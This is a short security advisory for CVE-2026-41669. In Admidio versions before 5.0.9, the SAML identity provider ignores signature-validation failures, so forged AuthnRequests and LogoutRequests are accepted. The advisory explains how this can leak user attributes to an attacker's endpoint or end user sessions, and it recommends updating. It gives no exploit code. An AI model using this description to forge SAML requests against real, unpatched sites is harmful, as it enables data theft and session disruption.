CVE-2026-41669

Name of the Vulnerable Software and Affected Versions Admidio versions prior to 5.0.9

Description The SAML Identity Provider implementation fails to properly handle the return value of the validateSignature() function. This function returns error strings upon failure instead of throwing exceptions, but the calling functions handleSSORequest() and handleSLORequest() discard these return values. Consequently, the smc require auth signed configuration option is ineffective, allowing unsigned or invalidly-signed SAML AuthnRequests and LogoutRequests to be processed as if they were valid.

This can lead to the disclosure of user attributes (such as login name, email, and roles) if a logged-in user is redirected to an attacker-controlled endpoint via a forged request. Additionally, it allows attackers to forge LogoutRequests to terminate user sessions and trigger cascading single logouts across registered Service Providers.

Recommendations Update to version 5.0.9. As a temporary workaround, restrict access to the SAML SSO and SLO modules or avoid relying on the smc require auth signed setting for security until the update is applied.